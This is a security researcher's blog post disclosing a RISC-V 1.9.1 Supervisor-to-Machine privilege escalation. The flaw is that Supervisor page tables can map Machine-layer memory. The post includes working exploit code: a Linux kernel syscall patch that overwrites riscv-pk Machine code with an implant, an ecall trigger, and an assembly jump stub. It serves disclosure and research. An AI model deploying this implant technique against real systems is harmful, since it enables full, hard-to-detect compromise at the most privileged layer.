Tuesday, April 18, 2017

The RISC-V Files: Supervisor -> Machine Privilege Escalation Exploit

The Demo

The following video demonstrates my original proof-of-concept exploit for the RISC-V privilege escalation logic flaw in the 1.9.1 version of the standard. The exploit lives in a patched Linux kernel, controlled through a simple userland application. The Linux kernel triggers the exploit and breaks out of Supervisor privilege in order to abuse the Machine level privilege. You may need to play the video in full-screen mode to view the console text. 


In the video, the userland application fakesyscall is used to control the exploit living in the Linux kernel. The first option passed to the app (and subsequently to the kernel) is 6. Option 6 simply tells the kernel to dump bytes of memory at a specific address in RAM. Option 8 then overwrites this same memory region with illegal opcodes. Option 6 is used again to verify that the opcodes have been overwritten. 

Finally, option 9 is used to tell the malicious kernel to trigger a call from its privilege layer (Supervisor) to Machine mode, which executes the overwritten instructions. This causes an unhandled exception in QEMU, which is displayed at the bottom of the screen at the end of the video ("unhandlable trap 2"). Trap 2 represents the illegal instruction trap, which is not supported in the Machine layer of this implementation (riscv64-system-qemu and riscv-pk). 

A Brief Introduction to RISC-V Privilege

The RISC-V privilege model was initially designed as an ecosystem that consists of four separate layers of privilege: User, Supervisor, Hypervisor, and Machine. The User privilege layer is, of course, the least privileged layer, where common applications are executed. Supervisor is the privilege layer where the operating system kernel (such as Linux, mach, or Amoeba) lives. The Hypervisor layer was intended to be the layer at which control subsystems for virtualization would live, but has been deprecated in more recent versions of the privilege specification. The Machine layer is the highest privileged layer in RISC-V, and has access to all resources in the system at all times. 


Full compromise of a system with a RISC-V core can't simply mean compromise of both the User and System privilege layers, which is the goal of most modern attacks. Rather, breaking out of the System layer into the Machine layer is required. This is because of the capability that the Machine layer will have in the future. 

The Hypervisor layer (H-Mode) is currently removed from the 1.10 privilege specification. The intent is that it may be re-added in a future revision of the privilege specification. Alternatively, it could be conglomerated with the Machine layer. Regardless, both layers are designed to control processor functionality that the Supervisor layer cannot access. This includes physical memory regions assigned to other hypervisor guests, restricted peripherals, Hypervisor and Machine registers, and other high-privileged objects. 

In the future, Machine mode may also be used as a subsystem similar to TrustZone or Intel SMM. Trusted keys may be used here to validate executable code running in the Hypervisor or Supervisor layer. It may also support Supervisor's verification of User layer applications. Other critical security goals can be achieved by leveraging the isolation and omnipotence of the Machine layer. Such functionality may be able to detect and disable a Supervisor layer exploit. Thus, escalating privileges from Supervisor layer to Machine layer as quickly as possible is imperative for future-proofing RISC-V exploits.

Resolving the Risk

Before we get into the technical details, it is important to note that the RISC-V team is aware of this privilege escalation problem. I presumed this when I discovered this vulnerability, as anyone with a background in operating system theory or CPU memory models will quickly observe the gap in security caused by the 1.9.1 privilege specification's memory definition. More on that later. 



Regardless, I was unable to find material supporting that the team knew of this security gap and, in my excitement, did not realize that a resolution to this issue was proposed 15 days prior to my HITB talk. Stefan O'Rear emailed me privately and pointed out the git commit for the proposal, which explained why I was unable to find it (I was using poor search terms in my haste). 

The proposal (for PMP: Physical Memory Protection) can be found here on github. In his email to me, Stefan points out that the image QEMU (and Bellard's riscvemu) executes, which contains the bootloader and the embedded Linux kernel/rootfs images, isn't designed for full Machine layer protection, and that it may not be updated with the PMP model in the near future. 

This is a reasonable perspective, but, academically, the exploit is still an important demonstration of flaws in CPU security logic. The target, itself, doesn't have to be an attempt at a perfectly secure system. It is more important that the exploit be proven practical and useful as an exercise. 

Besides, this was the first CPU level security implementation flaw I've ever discovered on my own accord. So, I had extra incentive to actually exploit it. ;-)

But PMP Existed!

Correct! For those familiar, there was a PMP definition in the v1.9.1 privilege specification of RISC-V. However, this implementation was considered incomplete and not capable of deployment. This is probably why the qemu-system-riscv* emulators don't support it currently. As the git commit declares, the PMP full proposal scheme was only introduced a couple weeks prior to this post. 

The Vulnerability

The technical vulnerability is actually quite simple, especially if the reader is familiar with common CPU models for memory protection. Each privilege layer is presumed to be isolated from all lower privileged layers during code execution, as one would expect. The CPU itself ensures that registers attributed to a specific privilege layer cannot be accessed from a less privileged layer. Thus, as a policy, Supervisor layer code can never access Machine layer registers. This segmentation helps guarantee that the state of each layer cannot be altered by lower privileged layers. 

However, the original privilege specification defined memory protection in two separate places. First, the mstatus register's VM field defines what memory protection model shall be used during code execution. This can be found in section 3.1.8 of privilege specification v1.9.1. Table 3.3 in that same section outlines the various memory protection/translation schemes currently defined by the RISC-V team. 

The second place where memory protection is defined isn't in the Machine layer at all, it's in the Supervisor layer. This is where things get tricky. Because the Supervisor layer is where a traditional Operating System kernel would execute, it must be able to alter page tables to support dynamic execution of kernel code and userland applications. Thus, the sptbr (Supervisor Page-Table Base Register), found in section 4.1.10, allows the Supervisor layer to control read and write access to the page tables. 


For those that are unfamiliar, page tables control translation of virtual memory addresses (va) to physical memory addresses (pa). Page tables also enforce access privileges for each page, e.g. whether the page is Read-Only, Write-Only, Executable, etc. 

Because the Machine layer of privilege's executable code resides in physical memory, and the Supervisor layer can create page tables that can access that physical memory, the Machine layer cannot protect itself from the Supervisor layer. 

The attack works this way:
  • A malicious Supervisor kernel determines the physical address of Machine layer code
  • The kernel creates a page table entry that grants itself read/write access to the Machine layer
  • The kernel overwrites Machine layer code with a beneficial implant
  • The kernel triggers a trap to Machine mode, causing the implant to be executed with Machine privileges
It's quite simple! 

The Exploit

The fun part about this vulnerability was not so much discovering it, but writing a useful exploit rather than simply a proof-of-concept that demonstrated code execution. At HITB2017AMS this past week, I used a simple PoC to show that implanted code was indeed executing in Machine mode. However, this is quite boring and has no real value beyond proving the vulnerability. 

A real exploit needs to allow code injection in a way that any arbitrary payload can be implanted and executed within the Machine context, from Supervisor context. To accomplish this, it was necessary to do the following:
  • Identify Machine layer code that the Supervisor can trigger at will
  • Identify an unused or little-used function in that code that can be altered without negative consequence
  • Ensure arbitrary payloads can be stored within this region  


Triggering Machine Layer Code

This is the simplest part of the process. Currently, booting a RISC-V system means using the Proxy Kernel (riscv-pk) as a bootloader. This code lives in the Machine layer and loads an embedded kernel (such as Linux or FreeBSD) into virtual memory. 

The riscv-pk must support the embedded kernel by providing resources, such as access to the console device, information about the RISC-V CPU core the kernel is running on, and other duties usually handled by mask ROM or flash. riscv-pk does this through the ecall instruction, the common instruction used to call the next most privileged layer in the processor. For example, an ecall executed at the User layer will likely be handled at the Supervisor layer. An ecall executed at the Supervisor layer will be handled by the Machine layer. (This is a simplistic explanation that can get more complex with trap redirection, but we won't dive into those waters at this moment). 

So, when the Supervisor (Linux kernel) executes ecall, the Machine layer's trap handler is executed in Machine mode. The code can be found in the riscv-pk at trap 9, the mcall_trap function, in machine/mtrap.c

Unused Functionality

Most of the functionality in mcall_trap must be preserved, to ensure the stability of the system. Overwriting arbitrary instructions here is frowned upon from an exploit developer perspective. Instead, we must target specific functionality to disturb as little of the ecosystem as possible. Fortunately, we can do so with the MCALL_SHUTDOWN feature. 

This feature does precisely what it sounds like, it performs an immediate system shut down as if someone hit an ACPI power-off button on a PC. Presumably, we would never do this in a system we've compromised. We want the system live so we can control it! Thus, this is the feature to overwrite. However, only a few instructions can be overwritten here as the functionality is small. Take a look at the assembly generated by this feature:

    80000dfc:   00008417                auipc   s0,0x8
    80000e00:   20440413                addi    s0,s0,516 # 80009000 <tohost>
    80000e04:   00100793                li      a5,1
    80000e08:   00f43023                sd      a5,0(s0)
    80000e0c:   00f43023                sd      a5,0(s0)
    80000e10:   ff9ff06f                j       80000e08 <mcall_trap+0x18c>

This only gives us 6 instructions to overwrite. Not much capability can be performed here! So, instead, we simply call another region of memory that can't be directly accessed by forcing a trap to mcall_trap

We can be a bit clever and overwrite the code that bootstraps the Proxy Kernel, do_reset. This function has zero value for an already running environment! So, why not reclaim the executable space? When reading the objdump of the current riscv-pk, we can see that 60 32bit instructions (or 120 16bit compressed instructions) can be stored here. If we simply jump to the do_reset address and perform our real work here, we can get away with quite a bit, especially if we can constantly update this region of memory with any payload we choose. 

Arbitrary Payloads 

Storing arbitrary payloads in this region simply means designing a sufficiently engineered implant stager in our patched malicious Linux (or other) kernel. This feature simply loads the physical memory addresses at which an implant should live, and installs the implant. Easy! There's not much to it. The only catch is ensuring our jump instructions know the address of the target physical memory address (and can reach the address using a single instruction). 

Linux Kernel Patch

The change to the Linux kernel is simple. We simply alter a system call to perform the implant installation and mtrap trigger. This can be done by augmenting any system call with two chunks of code:


                /* install implant at physical address a2 */
                else if(regs->a1 == 8)
                {       
                        uint8_t * c;
                        int i;
                        
                        /* Overwrite an address a2 of maximum size 4096 with
                         * binary code pointed to by a4 of size a3.
                         */
                        printk( 
                                "DONB: overwriting %p:%lx\n",
                                (const void * )regs->a2,
                                regs->a3);
                        
                        x = ioremap(regs->a2, 4096);
                        printk("DONB: remapped to %p\n", x);
                        
                        r = -1;
                        if(!access_ok(VERIFY_READ, regs->a4, regs->a3))
                        {       
                                printk("DONB: bad access_ok\n");
                                goto __bad_copy;
                        }
                        
                        printk("DONB: access ok\n");
                        if(regs->a3 <= 0 || regs->a3 > 4096)
                        {       
                                printk("DONB: bad a3\n");
                                goto __bad_copy;
                        }
                        
                        printk("DONB: a3 ok\n");
                        
                        if(__copy_from_user(
                                x,
                                (const void * )regs->a4,      
                                regs->a3))
                        {
                                printk("DONB: bad copy from user\n");
                                goto __bad_copy;
                        }

                        printk("DONB: copy ok\n");

                        iounmap(x);

                        /* update the tlb */
                        __asm__("fence; fence.i");

The above code installs an implant at the given physical address in system call argument 2. Argument 4 contains a pointer to a userland buffer containing the binary to be written at the mapped virtual address. Argument 3 contains the size of the binary blob to be written. The last function ensures that the TLB is updated since we are altering instruction code, which guarantees that the CPU has the updated copy of our executable code and wont execute an out of date cache, once triggered.

                /* trigger implant overwritten at MCALL_SHUTDOWN */
                else if(regs->a1 == 9)
                {       
                        printk("DONB(8): ok, now try the m-hook\n");
                        
                        /* MCALL_SHUTDOWN=6 */
                        __asm__("li a7, 6; ecall; mv %0, a0" : "=r" (r));
                        
                        printk("DONB(8): returned = %d\n", r);
                
                }

This code issues an ecall, causing mcall_trap to be executed from Machine mode context. This, in other words, executes our implant at a higher privilege level.

.global callreset
callreset:
        auipc t0, 0
        addi t0, t0, -1578
        addi t0, t0, -1578
        jalr t0

Finally, the above code, written to the MCALL_SHUTDOWN feature in the mcall_trap function, calls our implant at do_reset. The code in my version of riscv-pk expects do_reset at address 0x800001a8 and the overwritten MCALL_SHUTDOWN code at 0x80000dfc. The differential between these two addresses requires two addi instructions to generate the proper negative offset. This can probably be done in a cleaner manner. 

The only requirement left is for the implant at do_reset to restore the stack and return, to avoid crashing by not properly adjusting the Machine mode memory layout. This can be accomplished by returning to the mcall_trap function at an address where it is performing this functionality. In my implementation, there is only one address where this occurs, 0x80000ccc. 


Gimme Code

For working demonstration code, please visit my github archive where I will track all of my RISC-V related security research. 

More to come!

Best,

Don A. Bailey
Founder/CEO
Lab Mouse Security
Mastodon: @donb@mastodon.social